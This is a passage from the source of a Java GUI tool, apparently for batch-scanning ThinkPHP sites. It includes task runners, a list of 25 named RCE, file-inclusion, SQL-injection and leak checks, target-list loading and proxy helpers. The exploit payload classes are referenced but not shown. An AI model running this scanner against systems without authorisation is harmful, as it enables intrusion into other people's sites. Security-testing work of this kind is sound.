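            runCheck(version, bp, list_url.get(j));
        }
    }

    /**
     * Reachability probe used before the full check set is run against a URL.
     * Both timeouts are bounded so a host that accepts the connection but never answers
     * cannot stall the whole batch.
     */
    private boolean isReachable(String target) {
        try {
            HttpRequest.get(target).connectTimeout(5000).readTimeout(5000).code();
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    /** Runs one check against one URL and logs the outcome; never throws. */
    private void runCheck(String name, BasePayload bp, String target) {
        if (bp == null) {
            loginfo("[!] 未找到检测模块: " + name);
            return;
        }
        try {
            Result vul = bp.checkVUL(target);
            if (vul.isRes()) {
                loginfo("[+] 存在" + vul.getVuln());
                loginfo("Payload: " + vul.getPayload());
            } else {
                loginfo("[-] 不存在" + vul.getVuln());
            }
        } catch (Exception e) {
            if (e instanceof InterruptedException) {
                Thread.currentThread().interrupt();
            }
            loginfo("[!] " + name + " 检测异常: " + e);
        }
    }

    @Override
    protected void succeeded() {
        Platform.runLater(() -> {
            // Runs when the task has finished: tell the user the batch is complete.
            alert.setTitle("提示:");
            alert.setHeaderText("任务提示");
            alert.setContentText("批量检测任务执行完成");
            alert.showAndWait();
        });
    }

}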
104 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/service/CheckTask.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.service;
2 |
3 | import com.thinkphp.thinkphpgui.common.BasePayload;
4 | import com.thinkphp.thinkphpgui.util.ExpList;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 | import com.thinkphp.thinkphpgui.util.Tools;
7 | import javafx.application.Platform;
8 | import javafx.concurrent.Task;
9 | import javafx.scene.control.Alert;
10 | import javafx.scene.control.ComboBox;
11 | import javafx.scene.control.TextArea;
12 | import javafx.scene.control.TextField;
13 |
14 | import java.util.ArrayList;
15 |
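/**
 * Background task that runs the selected check, or every registered check, against the
 * single URL entered in the UI and streams the outcome into a text area.
 */
public class CheckTask extends Task<Void> {
    private static final String SEPARATOR =
            "=====================================================================";

    Alert alert = new Alert(Alert.AlertType.INFORMATION);
    private final ComboBox<String> comboBox;
    private final TextField url_txt;
    private final TextArea infores_txt;

    /**
     * @param comboBox    selector whose current item names the check to run ("ALL..." runs all)
     * @param url_txt     field holding the target base URL
     * @param infores_txt text area that receives the log lines
     */
    public CheckTask(ComboBox<String> comboBox, TextField url_txt, TextArea infores_txt) {
        this.comboBox = comboBox;
        this.url_txt = url_txt;
        this.infores_txt = infores_txt;
    }

    @Override
    protected Void call() throws Exception {
        check_vul();
        return null;
    }

    /** Appends one line to the output area on the FX thread. */
    public void loginfo(String info) {
        Platform.runLater(() -> this.infores_txt.appendText(info + "\r\n"));
    }

    /**
     * Runs the selected check(s) against the URL currently in the text field.
     *
     * <p>A selection that maps to no registered check is logged instead of failing the task
     * with a NullPointerException.
     *
     * @throws Exception whatever the individual check throws
     */
    public void check_vul() throws Exception {
        // NOTE(review): both controls are read off the FX thread; consider capturing the
        // values in the constructor instead.
        String url = this.url_txt.getText();
        String version = this.comboBox.getSelectionModel().getSelectedItem();

        if (version != null && version.startsWith("ALL")) {
            loginfo("检测所有漏洞中......");
            loginfo(SEPARATOR);
            // Iterable avoids depending on the concrete list class returned by ExpList.
            Iterable<String> versions = ExpList.get_exp();
            for (String v : versions) {
                runCheck(v, url);
            }
        } else {
            loginfo("检测漏洞 " + version + "中......");
            loginfo(SEPARATOR);
            runCheck(version, url);
        }
    }

    /** Looks up the named check, runs it against {@code url} and logs the outcome. */
    private void runCheck(String name, String url) throws Exception {
        BasePayload bp = Tools.getPayload(name);
        if (bp == null) {
            loginfo("[!] 未找到检测模块: " + name);
            return;
        }
        Result vul = bp.checkVUL(url);
        if (vul.isRes()) {
            loginfo("[+] 存在" + vul.getVuln());
            loginfo("Payload: " + vul.getPayload());
        } else {
            loginfo("[-] 不存在" + vul.getVuln());
        }
    }

    @Override
    protected void succeeded() {
        Platform.runLater(() -> {
            // Runs when the task has finished: tell the user the check is complete.
            alert.setTitle("提示:");
            alert.setHeaderText("任务提示");
            alert.setContentText("检测任务执行完成");
            alert.showAndWait();
        });
    }
}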
82 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/util/ExpList.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.util;
2 |
3 | import java.util.ArrayList;
4 | import java.util.List;
5 |
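/**
 * Ordered list of the check names offered by the tool.
 *
 * <p>Each name is also the lookup key used by {@code Tools.getPayload}; a name added here
 * without a matching entry there resolves to no check.
 */
public class ExpList {
    /** Check names in display and execution order. */
    private static final String[] NAMES = {
        "ThinkPHP 2 RCE",
        "ThinkPHP 5.0 RCE",
        "ThinkPHP 5.0.10 RCE",
        "ThinkPHP 5.0.22/5.1.29 RCE",
        "ThinkPHP 5.0.23 RCE",
        "ThinkPHP 5.0.24-5.1.30 RCE",
        "ThinkPHP 5 文件包含漏洞",
        "ThinkPHP 5 show-id RCE",
        "ThinkPHP 5 method filter RCE",
        "ThinkPHP 5 session 文件包含漏洞",
        "ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露",
        "ThinkPHP 5.x 数据库信息泄露",
        "ThinkPHP 5.x 日志泄露",
        "ThinkPHP 3.x RCE",
        "ThinkPHP 3.x 日志泄露",
        "ThinkPHP 3.x Log RCE",
        "ThinkPHP 6.x 日志泄露",
        "ThinkPHP 6 文件包含漏洞",
        "ThinkPHP 6 session文件写入",
        "ThinkPHP catch 命令执行漏洞",
        "ThinkPHP check-code sql注入漏洞",
        "ThinkPHP multi sql注入 && 信息泄露漏洞",
        "ThinkPHP orderid sql注入",
        "ThinkPHP update sql注入",
        "ThinkPHP recent_xff sql注入",
    };

    /**
     * Returns the check names.
     *
     * @return a fresh, mutable {@link ArrayList} on every call, so callers may cast or
     *         modify it without affecting later callers
     */
    public static List<String> get_exp() {
        List<String> list = new ArrayList<>(NAMES.length);
        for (String name : NAMES) {
            list.add(name);
        }
        return list;
    }
}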
37 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/util/Module.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.util;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 |
5 | import java.util.ArrayList;
6 |
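/**
 * Guesses which application module a target exposes by requesting a few well-known
 * module routes.
 */
public class Module {
    /** Module names tried in order; a plain array replaces the double-brace list. */
    private static final String[] CANDIDATES = {"manage", "admin", "api"};

    /**
     * Requests {@code url + "/?s=/" + candidate} for each candidate and returns the last
     * one answered with HTTP 200, or {@code "index"} when none is.
     *
     * <p>NOTE(review): a site that answers 200 for every route (custom error page,
     * catch-all router) makes every candidate match, so the result is only a hint. The
     * requests carry no timeout, so an unresponsive host blocks the caller.
     *
     * @param url base URL of the target
     * @return the detected module name, never {@code null}
     */
    public static String getModule(String url) {
        String mod = "index";
        for (String s : CANDIDATES) {
            try {
                int code = HttpRequest.get(url + "/?s=/" + s).code();
                if (code == 200) {
                    mod = s;
                }
            } catch (Exception e) {
                // Best effort: a failed request just leaves the current guess in place.
                e.printStackTrace();
            }
        }
        return mod;
    }
}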
28 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/util/Tools.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.util;
2 |
3 | import com.thinkphp.thinkphpgui.common.BasePayload;
4 | import com.thinkphp.thinkphpgui.common.ProxyAuthenticator;
5 | import com.thinkphp.thinkphpgui.exploit.*;
6 |
7 | import java.io.BufferedReader;
8 | import java.io.FileReader;
9 | import java.net.*;
10 | import java.util.*;
11 |
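/**
 * Shared helpers: check-name lookup, URL normalisation, URL-list loading, random strings
 * and JVM-wide proxy configuration.
 */
public class Tools {
    /** Check name (as listed by ExpList) mapped to the object that implements it. */
    private static final Map<String, BasePayload> payloadMap = new HashMap<>();

    static {
        payloadMap.put("ThinkPHP 2 RCE", new tp2_rce());
        payloadMap.put("ThinkPHP 5.0 RCE", new tp50());
        payloadMap.put("ThinkPHP 5.0.10 RCE", new tp5010());
        payloadMap.put("ThinkPHP 5.0.22/5.1.29 RCE", new tp5022_5129());
        payloadMap.put("ThinkPHP 5.0.23 RCE", new tp5023());
        payloadMap.put("ThinkPHP 5.0.24-5.1.30 RCE", new tp5024_5130());
        payloadMap.put("ThinkPHP 5 文件包含漏洞", new tp5_file_inclusion());
        payloadMap.put("ThinkPHP 5 show-id RCE", new tp5_showid_rce());
        payloadMap.put("ThinkPHP 5 method filter RCE", new tp5_method_filter_rce());
        payloadMap.put("ThinkPHP 5 session 文件包含漏洞", new tp5_session_include());
        payloadMap.put("ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露", new tp5_sql());
        payloadMap.put("ThinkPHP 5.x 数据库信息泄露", new tp5_db());
        payloadMap.put("ThinkPHP 5.x 日志泄露", new tp5_log());
        payloadMap.put("ThinkPHP 3.x RCE", new tp3());
        payloadMap.put("ThinkPHP 3.x 日志泄露", new tp3_log());
        payloadMap.put("ThinkPHP 3.x Log RCE", new tp3_log_rce());
        payloadMap.put("ThinkPHP 6.x 日志泄露", new tp6_log());
        payloadMap.put("ThinkPHP 6 文件包含漏洞", new tp6_lang());
        payloadMap.put("ThinkPHP 6 session文件写入", new tp6_session_file_write());
        payloadMap.put("ThinkPHP catch 命令执行漏洞", new tp_catch());
        payloadMap.put("ThinkPHP check-code sql注入漏洞", new tp_checkcode_time_sqli());
        payloadMap.put("ThinkPHP multi sql注入 && 信息泄露漏洞", new tp_multi_sql_leak());
        payloadMap.put("ThinkPHP orderid sql注入", new tp_pay_orderid_sqli());
        payloadMap.put("ThinkPHP update sql注入", new tp_update_sql());
        payloadMap.put("ThinkPHP recent_xff sql注入", new tp_view_recent_xff_sqli());
    }

    /**
     * Looks up the check registered under a display name.
     *
     * @param select check name as shown in the UI
     * @return the matching check, or {@code null} when the name is not registered
     */
    public static BasePayload getPayload(String select) {
        return payloadMap.get(select);
    }

    /** True when the text begins with {@code http://} or {@code https://}, ignoring case. */
    private static boolean hasHttpScheme(String weburl) {
        return weburl.regionMatches(true, 0, "http://", 0, 7)
                || weburl.regionMatches(true, 0, "https://", 0, 8);
    }

    /**
     * Reports whether the text already carries an HTTP(S) scheme.
     *
     * <p>The full scheme prefix is tested; a bare {@code startsWith("http")} would also
     * accept host names that merely begin with those letters.
     */
    public static boolean checkTheURL(String weburl) {
        return hasHttpScheme(weburl);
    }

    /**
     * Prefixes {@code http://} when the text has no HTTP(S) scheme.
     *
     * @param weburl URL or bare host
     * @return the input unchanged when it already has a scheme, otherwise with
     *         {@code http://} prepended
     */
    public static String addTheURL(String weburl) {
        if (!hasHttpScheme(weburl)) {
            weburl = "http" + "://" + weburl;
        }
        return weburl;
    }

    /**
     * Reads a target list, one URL or host per line.
     *
     * <p>Lines are trimmed and blank lines skipped, so stray whitespace in the file does not
     * become a bogus {@code http://} target. The reader is closed on every path.
     *
     * @param file path of the list file
     * @return the normalised URLs; empty when the file cannot be read
     */
    public static List<String> read_file(String file) {
        List<String> list = new ArrayList<>();
        try (BufferedReader br = new BufferedReader(new FileReader(file))) {
            String url;
            while ((url = br.readLine()) != null) {
                url = url.trim();
                if (url.isEmpty()) {
                    continue;
                }
                list.add(addTheURL(url));
            }
        } catch (java.io.IOException e) {
            // Best effort: an unreadable file yields whatever was read so far.
            e.printStackTrace();
        }
        return list;
    }

    /**
     * Builds a random alphanumeric string.
     *
     * <p>Uses {@link Random}, which is not cryptographically strong; the result must not be
     * relied on as a secret or an unguessable token.
     *
     * @param length number of characters; zero or negative yields an empty string
     */
    public static String getRandomString(int length) {
        String alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
        Random random = new Random();
        StringBuilder sb = new StringBuilder(Math.max(length, 0));

        for (int i = 0; i < length; ++i) {
            sb.append(alphabet.charAt(random.nextInt(alphabet.length())));
        }

        return sb.toString();
    }

    /**
     * Routes the JVM's HTTP and HTTPS traffic through a proxy.
     *
     * <p>The {@code https.*} properties are set as well; with only {@code http.*} set,
     * requests to HTTPS targets would bypass the proxy and leave the machine directly.
     */
    public static void setGlobalProxy(String proxyHost, String proxyPort) {
        System.setProperty("proxySet", "true");
        System.setProperty("http.proxyHost", proxyHost);
        System.setProperty("http.proxyPort", proxyPort);
        System.setProperty("https.proxyHost", proxyHost);
        System.setProperty("https.proxyPort", proxyPort);
    }

    /**
     * Same as {@link #setGlobalProxy(String, String)}, with proxy credentials.
     *
     * <p>The credentials are served to the JVM through the default {@link Authenticator}.
     * They are also stored in system properties, where any code in the process can read
     * them; {@link #removeGlobalProxy()} clears them again.
     * NOTE(review): recent JDKs disable Basic authentication for HTTPS tunnelling by
     * default ({@code jdk.http.auth.tunneling.disabledSchemes}) - confirm against the
     * proxy in use.
     */
    public static void setGlobalProxy(String proxyHost, String proxyPort, String proxyUser, String proxyPass) {
        setGlobalProxy(proxyHost, proxyPort);
        System.setProperty("http.proxyUserName", proxyUser);
        System.setProperty("http.proxyPassword", proxyPass);
        Authenticator.setDefault(new ProxyAuthenticator(proxyUser, proxyPass));
    }

    /**
     * Removes every proxy setting made by {@code setGlobalProxy}, including the stored
     * credentials, so they do not linger in system properties after the proxy is disabled.
     */
    public static void removeGlobalProxy() {
        System.setProperty("proxySet", "false");
        System.clearProperty("http.proxyHost");
        System.clearProperty("http.proxyPort");
        System.clearProperty("https.proxyHost");
        System.clearProperty("https.proxyPort");
        System.clearProperty("http.proxyUserName");
        System.clearProperty("http.proxyPassword");

        Authenticator.setDefault(null);
        // Re-installs the selector that is already the default; kept from the original.
        ProxySelector.setDefault(ProxySelector.getDefault());
    }

}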
114 |
--------------------------------------------------------------------------------
/src/main/resources/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: com.thinkphp.thinkphpgui.ThinkPhpGuiApplication
3 |
4 |
--------------------------------------------------------------------------------
/src/main/resources/com/thinkphp/thinkphpgui/thinkphp-view.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------